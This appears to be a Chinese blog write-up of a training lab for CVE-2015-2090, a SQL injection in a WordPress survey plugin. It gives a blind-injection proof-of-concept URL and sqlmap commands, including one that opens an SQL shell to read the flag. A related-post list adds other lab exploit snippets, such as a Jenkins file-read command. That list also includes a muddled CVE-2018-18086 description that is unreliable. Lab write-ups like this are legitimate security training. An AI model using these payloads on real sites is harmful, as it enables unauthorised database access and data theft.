春秋云镜 CVE-2015-2090

最新推荐文章于 2025-05-16 15:44:32 发布
最新推荐文章于 2025-05-16 15:44:32 发布
阅读量429 收藏
点赞数
分类专栏: 靶场 文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_22002773/article/details/132832568
版权
文章描述了WordPress插件WordPressSurvey&Poll1.1.7版本中的SQL注入漏洞,攻击者可通过admin-ajax.php脚本中的未过滤参数进行恶意操作,包括利用POC执行SQL命令并使用Sqlmap工具获取flag。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

春秋云镜 CVE-2015-2090 wordpress插件 WordPress Survey & Poll – Quiz, Survey and Poll <= 1.1.7

靶标介绍

wordpress插件 WordPress Survey & Poll – Quiz, Survey and Poll <= 1.1.7 p-admin/admin-ajax.php脚本没有充分过滤ajax_survey操作中的 survey_id 参数导致SQL注入。

启动场景

在这里插入图片描述

漏洞利用

exp

 POC
- http://[target]/wp-admin/admin-ajax.php?action=ajax_survey&sspcmd=save&survey_id=3556498 [SQLi]
- DataBase() => "http://[target]/wp-admin/admin-ajax.php?action=ajax_survey&sspcmd=save&survey_id= 3556498 AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),3,1))>[Numbers compare]

Sqlmap
- sqlmap -u "http://[target]/wp-admin/admin-ajax.php?action=ajax_survey&sspcmd=save&survey_id=3556498" -p survey_id --dbms=mysql

python3 sqlmap.py -u “http://eci-2zedttamjkr7hljuymte.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php?action=ajax_survey&sspcmd=save&survey_id=3556498” -p survey_id --dbms=mysql --sql-shell
在这里插入图片描述
select flag from flag;

得到flag
在这里插入图片描述

flag{47a53914-9e6e-41d7-9c6e-0205e3291048}

7z apache解析漏洞_Adobe Reader及Acrobat Pro特权提升漏洞解析(CVE-2015-5090)
weixin_39672680的博客
12-22 505
*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。0x01前言CVE-2015-5090是存在于AdobeReader/AcrobatPro中的一个bug,并且早在几个月前就已经被发现并提交至ZDI了。本文主要是讲这个bug的细节,并分享几种不同攻击方法。AdobeARMService是Adobe的更新程序,是在AdobeR...
春秋CVE-2022-30887 Pharmacy Management System shell upload漏洞复现
Ambition_sec的博客
11-17 1737
春秋CVE-2022-30887 Pharmacy Management System shell upload漏洞复现
春秋靶机
niqiu320的博客
04-10 2299
Spring framework 是Spring 里面的一个基础开源框架,其目的是用于简化 Java 企业级应用的开发难度和开发周期,2022年3月31日,VMware Tanzu发布漏洞报告,Spring Framework存在远程代码执行漏洞,在 JDK 9+ 上运行的 Spring MVC 或 Spring WebFlux 应用程序可能容易受到通过数据绑定的远程代码执行 (RCE) 的攻击。WSO2文件上传漏洞(CVE-2022-29464)是Orange Tsai发现的WSO2上的严重漏洞。
春秋境】CVE-2022-26271
ZXW_NUDT的博客
04-11 2569
下载文件后打开即可得到flag。
TLS/SSl相关的攻击漏洞及检测方法大杂烩!
qq_50854662的博客
08-15 4739
TLS/SSl相关的攻击漏洞及检测方法大杂烩!
春秋CVE-2023-38836
weixin_53974661的博客
02-24 169
BoidCMS v.2.0.0 存在文件上传漏洞,远程攻击者可通过添加 GIF 头部绕过 MIME 类型检查,执行任意代码。使用蚂剑链接 链接地址为GIF89a.php 的浏览地址。点击admin panel。password 登录成功。
春秋 CVE-2023-26469
qq274575499的博客
03-29 3074
Jorani是一款开源的员工考勤和休假管理系统,适用于中小型企业和全球化组织,它简化了员工工时记录、休假请求和审批流程,并提供了多语言支持以满足不同地区的需求。在 Jorani 1.0.0 中,攻击者可以利用路径遍历来访问文件并在服务器上执行代码。
春秋 CVE-2024-23897
weixin_51588494的博客
09-08 1270
Jenkins提供了一个命令行接口,用户可以通过jenkins-cli.jar调用这个接口来执行一些jenkins的功能,但是由于使用jenkins-cli.jar执行命令行时,命令行是在服务端调用第三方库 args4j 进行解析的,如果参数是以@开头,就会被认为是一个文件名,并且的将文件内容读取出来作为参数,然后引发报错,将文件内容通过报错显示出来,造成了文件读取。猜测使用java -jar jenkins-cli.jar -s http://xxx/ -http help 1 "@/flag"
春秋 CVE-2023-1313
qq274575499的博客
04-03 1619
cockpit在2.4.1版本之前存在任意文件上传漏洞PS:通过在浏览器中打开/install来运行安装。
春秋 CVE-2022-4230
qq274575499的博客
05-07 2025
WP Statistics WordPress 插件13.2.9之前的版本不会转义参数,这可能允许经过身份验证的用户执行 SQL 注入攻击。默认情况下,具有管理选项功能 (admin+) 的用户可以使用受影响的功能,但是该插件有一个设置允许低权限用户也可以访问它。
春秋CVE-2022-4230 夺旗
05-02
### 春秋CVE-2022-4230 夺旗知识点解析 #### 一、漏洞概述 **CVE-2022-4230** 是一个存在于 **WP Statistics** WordPress 插件(版本13.2.9及以前)中的安全漏洞。该漏洞的主要原因是插件在处理特定参数时...
春秋CVE-2024-0195【记录】
zhiquovo的博客
03-07 1358
春秋CVE-2024-0195【记录】 漏洞描述 SpiderFlow爬虫平台项目中spider-flow-web\src\main\java\org\spiderflow\controller\FunctionController.java文件的FunctionService.saveFunction函数调用了saveFunction函数,该调用了自定义函数validScript,该函数中用户能够控制 functionName、parameters 或 script 中的内容,从而构造恶意输入来执行
春秋CVE-2022-22733 Apache ShardingSphere ElasticJob UI 敏感信息泄漏漏洞 解题思路
Dark-Specter的博客
03-25 2692
网络安全中的信息泄露通常是指敏感数据无意或有意地被透露给未经授权的人员或系统。这种泄露可以通过多种方式发生,主要涉及技术漏洞、操作失误、内部威胁或安全策略的不足。
春秋CVE-2022-32991 Web Based Quiz System SQL注入
Ambition_sec的博客
11-16 762
春秋CVE-2022-32991 Web Based Quiz System SQL注入
WEB安全--Java安全--shiro550反序列化漏洞
m0_74800552的博客
05-16 292
shiro550反序列化
《医院网络安全运营能力成熟度评估指南》(试行版)研究解读
AllenLV的博客
05-13 1244
随着信息化融入医院各领域全过程,信息系统成为医院管理与服务运行的必要支撑,同时面临外部攻击、内部漏洞及自然灾害等网络安全风险。2022年,卫生健康行业主管部门印发《医疗卫生机构网络安全管理办法》,提出构建“管理、技术、运营”三位一体的安全防护体系。各级医院启动安全防护体系建设,但因管理水平、人员能力和资金投入的差距,缺乏客观评价依据。
WEB安全--Java安全--shiro721反序列化漏洞
最新发布
m0_74800552的博客
05-16 579
shiro721反序列化
EDR与XDR如何选择适合您的网络安全解决方案
hello.reader
05-13 1012
随着网络威胁日益复杂,勒索软件、零日攻击和高级持续性威胁(APT)对企业构成重大挑战。**端点检测与响应(EDR)**和**扩展检测与响应(XDR)**是当前网络安全的两大核心工具。本文将深入解析EDR与XDR的功能、原理、差异及适用场景,助您选择最佳解决方案。
SpringBoot框架开发网络安全科普系统开发实现
幽络源
05-10 838
基于SpringBoot的网络安全科普系统开发方案,系统包含知识科普、案例学习、在线测试等功能,适合网络安全教育培训。
春秋CVE-2018-18086
01-23
### 关于春秋 CVE-2018-18086 漏洞详情 对于CVE-2018-18086漏洞,此安全问题存在于Python的PyPI仓库中,在处理特定类型的HTTP请求时存在缺陷。具体来说,当服务器接收到带有特制User-Agent头的HTTP请求时,可能导致拒绝服务(DoS),这是因为解析User-Agent字符串的过程中出现了错误[^1]。 然而,针对春秋环境下的该漏洞描述并不完全适用上述情况。实际上,CVE-2018-18086主要影响的是使用pip工具安装软件包的过程。攻击者可以利用这个漏洞通过发送恶意构造的数据来触发异常条件,进而造成目标系统资源耗尽或崩溃,从而实现拒绝服务攻击的目的[^2]。 #### 影响范围 受影响版本包括但不限于: - Python pip < 10.0.1 #### 解决方法与建议措施 为了防止此类攻击的发生并保障系统的安全性,官方推荐采取如下行动: 1. 升级至最新稳定版pip (当前至少应升级到10.0.1及以上版本)[^3]。 ```bash python -m pip install --upgrade pip ``` 2. 对内部网络流量实施严格监控,特别是对外部访问的过滤机制要更加严谨,阻止任何可疑活动进入内网环境中。 3. 定期审查依赖库的安全状态,及时更新项目所使用的第三方组件,确保其处于最新的维护状态下运行。 4. 增强开发者意识培训,教导如何识别潜在风险以及编写更健壮的应用程序代码实践指南。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值